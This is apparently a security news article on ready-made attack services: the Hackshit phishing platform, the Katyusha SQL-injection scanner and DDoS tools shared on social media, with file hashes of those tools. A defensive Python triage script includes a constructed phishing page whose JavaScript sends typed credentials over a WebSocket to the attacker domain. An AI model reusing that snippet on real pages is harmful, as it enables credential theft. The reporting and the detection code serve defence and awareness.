In this article we discuss the online tools and services now available to wannabe criminals, a dangerous trend.
Hackshit PhaaS platform
Today it is quite easy to carry out almost any kind of attack without specific knowledge; phishing campaigns run with tools like Hackshit are one example.
The Hackshit crimeware-as-a-service was discovered by experts from Netskope Threat Research Labs in July. It is a Phishing-as-a-Service (PhaaS) platform that offers a low-cost “automated solution for novice fraudsters”.
The platform allows would-be fraudsters to easily launch a phishing campaign. Hackshit attracts new subscribers by offering them free trial accounts to view a limited set of hacking tutorials and tricks to make easy money.
“Netskope Threat Research Labs recently discovered a Phishing-as-a-Service (PhaaS) platform called Hackshit that logs the credentials of phishing victims. Phishing pages are wrapped with base64 encoding and served from secure (HTTPS) websites with the “.moe” top-level domain (TLD) to avoid traditional scanners. The “.moe” TLD is intended for the purpose of ‘Marketing the products or services considered.’ The victim’s credentials are sent to the Hackshit PhaaS platform via web sockets,” says a blog post published by Netskope.
The PhaaS platform was discovered during research into CloudPhishing attack trends: Netskope experts observed a phishing site using a data URI scheme to serve base64-encoded content (data:text/html;base64) delivered from https://a.safe.moe.
When visiting the link, the researchers were presented with a phishing login page for Google Docs. Once victims provided their credentials, they were redirected to a second phishing page whose source also uses a data URI scheme to serve base64-encoded content (data:text/html;base64), again from https://a.safe.moe.
This second phishing page was designed to trick victims into providing their email account recovery details. Once the victim provides their details, they will be redirected to the original Google recovery page.
The experts decoded the two phishing pages and found that the credentials are sent to the attacker via a web socket at https://pod[.]logshit[.]com and https://pod-1[.]logshit[.]com.
“Access to logshit[.]com led us to the discovery of a PhaaS site called Hackshit, as shown in the image. Further research concluded that the site serves as a PhaaS platform,” the blog post continues.
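The decoding step the researchers describe, as an added example (this is not Netskope's code): a small Python triage helper that takes a data:text/html;base64 URI, decodes the embedded page, and reports any WebSocket endpoints and password fields it finds. The sample page is constructed here to mimic the behaviour described above; the endpoint hostname is taken from the indicators in the text, while the form markup and script are assumptions.

```python
"""Triage helper: decode a data:text/html;base64 URI and look for credential
exfiltration over WebSockets, as in the Hackshit pages described above.
Added example, not Netskope's code; the sample page below is constructed."""
import base64
import re
from urllib.parse import unquote

# data:[<mime>][;param...],<payload>
DATA_URI_RE = re.compile(
    r"^data:(?P<mime>[^;,]*)(?P<params>(?:;[^;,]*)*),(?P<payload>.*)$", re.DOTALL
)
# ws:// or wss:// URLs appearing anywhere in the page source
WS_URL_RE = re.compile(r"""wss?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s'"<>)]*)?""")
PASSWORD_FIELD_RE = re.compile(r"""type\s*=\s*['"]?password['"]?""", re.IGNORECASE)


def decode_data_uri(uri: str) -> tuple[str, bytes]:
    """Return (mime type, raw body) for a data: URI; handles base64 and percent-encoding."""
    m = DATA_URI_RE.match(uri.strip())
    if not m:
        raise ValueError("not a data: URI")
    mime = m.group("mime") or "text/plain"
    params = m.group("params").lower().split(";")
    payload = m.group("payload")
    if "base64" in params:
        # Tolerate stripped padding, which trips up naive decoders
        payload += "=" * (-len(payload) % 4)
        return mime, base64.b64decode(payload)
    return mime, unquote(payload).encode()


def analyze_data_uri(uri: str) -> dict:
    """Decode the page and flag it if a password field coexists with a WebSocket endpoint."""
    mime, body = decode_data_uri(uri)
    html = body.decode("utf-8", errors="replace")
    endpoints = sorted(set(WS_URL_RE.findall(html)))
    has_password = bool(PASSWORD_FIELD_RE.search(html))
    return {
        "mime": mime,
        "websocket_endpoints": endpoints,
        "has_password_field": has_password,
        "suspicious": has_password and bool(endpoints),
    }


# Constructed sample modelled on the described page: a login form whose submit
# handler pushes the credentials to the logger over a WebSocket, then redirects
# to a second-stage page (placeholder URI, not a real second stage).
SAMPLE_PAGE = """<html><body>
<form id="login"><input name="email"><input name="pass" type="password">
<button>Sign in</button></form>
<script>
var ws = new WebSocket("wss://pod.logshit.com/socket");
document.getElementById("login").onsubmit = function (e) {
  e.preventDefault();
  ws.send(JSON.stringify({u: this.email.value, p: this.pass.value}));
  location.href = "data:text/html;base64,...";
};
</script></body></html>"""
SAMPLE_URI = "data:text/html;base64," + base64.b64encode(SAMPLE_PAGE.encode()).decode()

if __name__ == "__main__":
    print(analyze_data_uri(SAMPLE_URI))
```

The point of the check is that a URL scanner which only evaluates the outer HTTPS host (here a ".moe" site with a valid certificate) sees nothing wrong; the indicators live inside the base64 body, so decode before you classify. Modern browsers have since blocked top-frame navigation to data: URLs (Chrome did so in version 60), which closes this particular delivery trick but not pages served directly from a look-alike HTTPS host.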
Hackshit is a PhaaS platform that offers various phishing services that fraudsters could use to customize their phishing campaign. Subscribers can easily create their own unique phishing pages for many popular services, including Yahoo, Facebook and Gmail.
The discovery of Hackshit revealed another interesting aspect of the platform: it also runs a black market for buying and selling such services.
“A marketplace is a portal that offers services to be bought and sold to carry out phishing attacks,” explained Netskope researcher Ashwin Vamshi.
“The attacker then generates a phishing page from the page link/generator and logs into the victim’s email account, displays all contacts, and sends an email with the phishing link embedded.”
The marketplace allows a cybercriminal to purchase login accounts obtained through phishing attacks, and accepts payment in Perfect Money or Bitcoin.
Experts also noticed that the Hackshit website uses a TLS certificate issued by the free, automated certificate authority Let’s Encrypt; the browser padlock only proves that the connection is encrypted to whoever controls the domain, not that the site is legitimate.
The operators behind Hackshit PhaaS offer several subscription levels from Starter to Master, ranging from $40 per week to $250 for 2 months.
Katyusha Scanner, the new SQLi Vulnerability Scanner
A few weeks ago, experts at Recorded Future discovered a fully automated SQLi vulnerability scanner called Katyusha Scanner on a hacking forum. The tool was offered for sale for $500; it allows mass scanning and is easily managed from a smartphone via the Telegram messenger.
Again, the tool has been designed so that anyone can use it, even without specific technical skills. It appeared in the hacking underground in early April and, according to the researchers, it was built on the open source penetration testing tool Arachni Scanner.
To use the tool, attackers just need to set up a standard web server with a version of the Arachni scanner that has been modified to allow control of the operation via a linked Telegram account.
The authors of the Katyusha Scanner seem to be very active; they have updated this tool seven times since it went online.
The Katyusha scanner was offered in Pro and Lite versions, which range between $250 and $500.
The Pro version goes further and uses known exploits to break into the target; once an SQL injection flaw is found, the tool notifies the attacker via a Telegram message that includes the website name, its Alexa rank and the number of available databases.
“On April 8, 2017, a Russian-speaking member of a top hacking forum introduced “Katyusha Scanner”, a powerful and fully automated SQLi vulnerability scanner that uses the features of Telegram messenger and Arachni Scanner, an open source penetration testing tool,” according to a blog post published by Recorded Future.
“The released product, along with excellent support and frequent updates, immediately gained popularity and recognition from grateful clients for its intuitive and straightforward interface, as well as incredible performance.”
The seller is a member of a top-tier Russian-speaking hacking forum, where the tool is commercialized, and is known in the underground for selling data stolen from e-commerce websites.
The tool is controlled via Telegram: operators upload a list of target websites and launch a concurrent attack against all of them.
Because the control channel is Telegram, attackers can drive the attack from almost any mobile OS.
“Interestingly, the name Katyusha was not chosen by chance – it represents the iconic multiple rocket launcher, developed by the Soviet Union during World War II, known for causing panic in Nazi forces with its stealthy and devastating attacks. Similar to the highly lethal weapon created 70 years ago, the Katyusha Scanner allows criminals to launch large-scale penetration attacks against a large number of targeted websites with a few clicks using their smartphones,” the analysis continues.
The seller suggests starting with a list of at least 500 target pages; the attacker then issues commands to scan them for known vulnerabilities. The Pro version also implements the ability to download all of the exfiltrated data.
At the time of discovery, at least 12 to 15 users had already purchased the tool and left positive feedback about its effectiveness.
The potential range of attacks this tool can support is alarming.
“When dozens buy it and launch attacks every day, the potential impact will be significant,” said Recorded Future’s advanced collection director Andrei Barysevich. “The range of attacks available to criminals is now completely unprecedented. And the convenience of this; someone who wants to engage in this type of activity doesn’t have to be a hacker, doesn’t have to know how certain tools work, or what exploit packages to use. The tool will do everything for them.”
Recorded Future reported the discovery to law enforcement.
Availability of DDoS tools online
We have shown that it is quite simple and cheap to pay for SQL Injection attacks or to organize phishing campaigns; what about DDoS attacks?
It is no mystery that finding a booter or DDoS-for-hire service online is quite easy. According to a study conducted by Arbor’s ASERT team in 2016, a day-long DDoS booter attack costs $60 and can cause $720,000 in damage.
Sometimes booter or stresser services are marketed as would-be legitimate tools for security professionals who need to test their infrastructure’s resilience to cyberattacks or its ability to handle high volumes of traffic.
Unfortunately, criminal organizations continue to abuse booters for illegal DDoS attacks, one of the most popular examples being the one used by LizardSquad hackers, LizardStresser.
Popular security expert Brian Krebs and a research team discovered that the Lizard Stresser DDoS tool relies on compromised home routers, which is very common for this kind of illegal service.
DDoS tools require no apparent skill to use, just by providing an IP address an attack can be launched. These tools are increasingly available on the Internet.
The internet is full of places where software and platforms specifically designed for DDoS attacks can be found, and the main problem is that many young people download and use these tools.
Many criminal groups distribute these tools more and more openly on the mainstream social media where most of the younger generation spends its time.
Security experts from the cyber research division of Frontline Cyber Security Ltd recently discovered several DDoS tools while browsing the web and searching some popular social media sites, and found how easily such tools are available to ordinary web users.
The distributed denial-of-service applications found by the experts are listed below as tool name, antivirus detection label and MD5 hash (details removed from the download links; please contact us if you are a researcher/analyst). Note that the detection labels mark several of them as trojans rather than mere attack tools (DarkKomet is a remote access trojan), so whoever downloads them is often the first victim:
- LOIC RedCult Edition – RiskwareAgent – MD5 609db4b9154f9aee29a5ceb775bec655
- RedCult Dose – Loic.7 – MD5 6d0abacacd4393f9b3e30b2ed3be316e
- RC Door – Malware.SDi.5EDF – MD5 b1465ff2711b3cc9c4c8faf414354e7d
- exe – Win32.DarkKomet – MD5 606aeb40c65070d234e1617d1ab257ff
- ddos_android – Android.SpyAgent – MD5 c99ccf4d61cefa985d94009ad34f697f
A screenshot of the Android app running shows how little is required: fill in a few fields and click submit.
The experts also obtained a list of targets that the applications were released to attack, and managed to collect screenshots of the tools being used against government sites.
Further images show the app being used in what appears to be one of the many Anonymous operations under the #OpIsrael banner.
The experts have also collected information about the servers the tool was designed to attack, but cannot publish it at this time.
A further figure shows the application being shared and distributed.
Regarding the DDoS tools mentioned above, the authorities have been notified and are helping to remove them.
The examples presented in this short article show that it is quite easy for an attacker to mount a cyber attack even without specific technical skills.
The analysis of Hackshit showed that crimeware-as-a-service poses a serious risk to businesses and end users, bringing would-be hackers into the cybercrime arena.
DDoS attacks, phishing campaigns and SQL Injection attacks are among the most popular threats to organizations and companies today.
The availability of any kind of hacking tools and services online makes it even easier for criminals to enter the cyber arena.